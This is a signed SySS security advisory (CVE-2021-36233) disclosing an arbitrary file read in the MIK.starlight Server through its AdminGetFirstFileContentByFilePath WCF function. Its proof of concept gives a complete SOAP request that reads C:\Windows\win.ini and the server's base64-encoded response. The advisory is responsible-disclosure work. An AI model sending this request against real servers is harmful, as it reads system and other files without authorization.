-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-037
Product:                   MIK.starlight Server
Manufacturer:              MIK GmbH
Affected Version(s):       -
Tested Version(s):         7.9.5.24363
Vulnerability Type:        CWE-552: Files or Directories Accessible to External Parties
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2021-07-02
Solution Date:             -
Public Disclosure:         2021-08-27
CVE Reference:             CVE-2021-36233
Authors of Advisory:       Johannes Eger, Nicola Staller

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The MIK.starlight server is a web server that provides the basis for the 
MIK.starlight suite. 

The manufacturer describes the product as follows (see [1]):

"MIK.starlight suite offers exceptional customisable user interfaces
for data analytics and reporting. With our self-service business 
intelligence solutions, users can easily create their own reports or 
adapt existing ones, freeing up time and ensuring optimum flexibility."

Legitimate functionality of the web server allows attackers to read
arbitrary files from the file system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The MIK.starlight server offers a multitude of functions that can be
called through a WCF endpoint. One of them is the function 
"AdminGetFirstFileContentByFilePath". 

The function allows administrators to read arbitrary files from the
file system. Due to another vulnerability described in SYSS-2021-036,
any authenticated user can call this function.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following request is sent in an attempt to read the contents of
the file C:\Windows\win.ini:

POST /MikStarLightWCF/MikStarLightWCFService HTTP/1.1
Accept: */*
Accept-Language: de-DE
Content-Length: 731
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IMikStarLightWCFService/AdminGetFirstFileContentByFilePath"
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko
Host: IP:PORT
Pragma: no-cache
Connection: close
Proxy-Connection: Keep-Alive

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <AdminGetFirstFileContentByFilePath xmlns="http://tempuri.org/">
      <sessioninfos xmlns:d4p1="http://schemas.datacontract.org/2004/07/MikStarLightBase.Project" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
        <d4p1:Designer>false</d4p1:Designer>
        <d4p1:Id2>###############</d4p1:Id2>
        <d4p1:MUid i:nil="true" />
        <d4p1:SessionID>#############</d4p1:SessionID>
	<d4p1:UserName>USERNAME</d4p1:UserName>
      </sessioninfos>
      <fileFullPath>C:\Windows\win.ini</fileFullPath>
      <maxSize>1111111</maxSize>
      <shared>true</shared>
    </AdminGetFirstFileContentByFilePath>
  </s:Body>
</s:Envelope>

The server sent the following response, containing the contents of
the requested file encoded as base64:

HTTP/1.1 200 OK
Content-Length: 1593
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 26 May 2021 08:33:04 GMT
Cache-Control: proxy-revalidate
Connection: close

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><AdminGetFirstFileContentByFilePathResponse xmlns="http://tempuri.org/"><AdminGetFirstFileContentByFilePathResult xmlns:a="http://schemas.datacontract.org/2004/07/MikStarLightBase.Project" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:ActionResults i:nil="true"/><a:ActualSessionID>0</a:ActualSessionID><a:AutoLogin>false</a:AutoLogin><a:BooleanResult>false</a:BooleanResult><a:BooleanResult2>false</a:BooleanResult2><a:CheckOutOK>false</a:CheckOutOK><a:Data>OyBmb3IgMTYtYml0IGFwcCBzdXBwb3J0DQpbZm9udHNdDQpbZXh0ZW5zaW9uc10NClttY2kgZXh0ZW5zaW9uc10NCltmaWxlc10NCltNYWlsXQ0KTUFQST0xDQo=</a:Data><a:Data2 i:nil="true"/><a:DataList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:ElementFavorites i:nil="true"/><a:ErrorList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:IntResult>0</a:IntResult><a:MikBisDbcState>Initial</a:MikBisDbcState><a:NrFailedActions>0</a:NrFailedActions><a:SerializerTypeResult>PolenterMiniLZO</a:SerializerTypeResult><a:ServerResult>OK</a:ServerResult><a:StringResult i:nil="true"/><a:StringResult2 i:nil="true"/><a:StringResult3 i:nil="true"/><a:StringResults i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Uid i:nil="true"/><a:UpdateNecessary>false</a:UpdateNecessary><a:WarningList i:nil="true" xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></AdminGetFirstFileContentByFilePathResult></AdminGetFirstFileContentByFilePathResponse></s:Body></s:Envelope>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS is not aware of a solution for the described security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability reported to manufacturer
2021-08-27: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for MIK.starlight
    https://www.mik.de/starlight-bi-suite-2/
[2] SySS Security Advisory SYSS-2021-037
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-037.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Johannes Eger and Nicola Staller
 of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332  637C 9DF3 39F9 41DD 2290 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmEnTxgACgkQnfM5+UHd
IpBF9Q//UvGC6iWTcDcPeq1lmxC7ZB/3W3h6UT33AHRGeT32qpHo4yBHRjeQ7FA4
hbSN6eyt5msM7UXz/eXUeZd0ndD+RUjdCPdG3EEfhBLyD6n5lwaq7Y6LlKCXEaI1
RSDcTNmELmG1bgzlrJVlAi9xSZBLlchTQLsiLXxlQhcdO38HxdtjdQvA3SF+A7fi
jON2mHYoXh5h+lkxIQ1X0hUKGogBQVCrTeHuwl0P13lGhPcgemOH2OJi/7voPkA3
Cd4b7fdJaPLaEccxvkpEykPN3Os24XPv1fBLRF890CHkCQyvd5p7bDdjH7epuRyz
ahkeMxEZSOTUExdCu+dcPkMxMqkL77y08+HCtoiVv0iFLpIrFbxRCFx2/WivNLBj
SRvIVRmr8Q5ghUNCVpLWDG09PWGC3g569bKvU0Wyyo+jGJgCsFEHSWs55atPqr94
rmMuTDEqf3IsErkpqQFuKK5XcFu1j71sVzPYuyL0r/l3PQBMwobWeACA9v9WYuo8
93cMU8Yzqk9CVNbi+TuU24NfgY3RYBJnT4lOKq4tQg2/pL8U//4Jx2+ifS60d5LL
x3mao47BOLr0Y07SLphAqMFbXdwTXQvRrdY4QcQxI3LbfENcw8CjYOOAJkP+9U5+
IBBY7TjOPOKpOG5A72zllvJBAICNgANm62Zb2f1bGwULa44CSUE=
=6L8r
-----END PGP SIGNATURE-----